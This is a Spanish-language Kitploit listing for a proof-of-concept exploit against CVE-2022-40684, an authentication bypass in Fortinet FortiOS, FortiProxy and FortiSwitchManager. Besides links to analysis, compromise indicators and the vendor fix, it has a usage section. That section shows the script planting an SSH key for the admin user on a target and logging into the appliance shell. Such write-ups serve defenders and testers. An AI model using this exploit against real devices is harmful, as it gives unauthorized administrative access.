Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2022-40684 — Un exploit de prueba de concepto para CVE-2022-40684 que afecta a Fortinet FortiOS, FortiProxy y FortiSwitchManager | Kitploit
Herramientas/GitHubGitHub/horizon3ai/cve-2022-40684
Frameworks de ExploitsAnálisis de VulnerabilidadesExplotaciónPruebas de PenetraciónAutenticaciónRed Teaming
GitHubhorizon3ai/cve-2022-40684

CVE-2022-40684

Un exploit de prueba de concepto para CVE-2022-40684 que afecta a Fortinet FortiOS, FortiProxy y FortiSwitchManager

Ver Repositorio
358904hace 3 añosRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2022-40684

POC para CVE-2022-40684 que afecta a los appliances Fortinet FortiOS, FortiProxy y FortiSwitchManager.

Análisis Técnico

Un análisis técnico de la causa raíz de la vulnerabilidad se puede encontrar en nuestro blog: https://www.horizon3.ai/fortios-fortiproxy-and-fortiswitchmanager-authentication-bypass-technical-deep-dive-cve-2022-40684

Indicadores de Compromiso

Para analizar los registros de Fortinet en busca de indicadores de compromiso y cómo habilitar registros más profundos, consulte nuestro blog de IOC: https://www.horizon3.ai/fortinet-iocs-cve-2022-40684/

Resumen

Este POC abusa de la vulnerabilidad de omisión de autenticación para establecer una clave SSH para el usuario especificado.

Uso

root@kitploit:~
root@kali:~# python3 CVE-2022-40684.py -t 10.0.40.67 --username admin --key-file ~/.ssh/id_rsa.pub
[+] SSH key for admin added successfully!
root@kali:~# ssh [email protected]
fortios_7_2_1 # 
config      Configure object.
get         Get dynamic and system information.
show        Show configuration.
diagnose    Diagnose facility.
execute     Execute static commands.
alias       Execute alias commands.
exit        Exit the CLI.

Mitigaciones

Actualice a la última versión o mitigue siguiendo las instrucciones dentro del PSIRT de Fortinet

  • https://www.fortiguard.com/psirt/FG-IR-22-377

Siga al Horizon3.ai Attack Team en Twitter para las últimas investigaciones de seguridad:

  • Horizon3 Attack Team
  • James Horseman
  • Zach Hanley

Descargo de responsabilidad

Este software ha sido creado puramente con fines de investigación académica y para el desarrollo de técnicas defensivas efectivas, y no está destinado a ser utilizado para atacar sistemas excepto cuando esté explícitamente autorizado. Los mantenedores del proyecto no son responsables ni se les considera responsables del mal uso del software. Úselo de manera responsable.

Descargar herramienta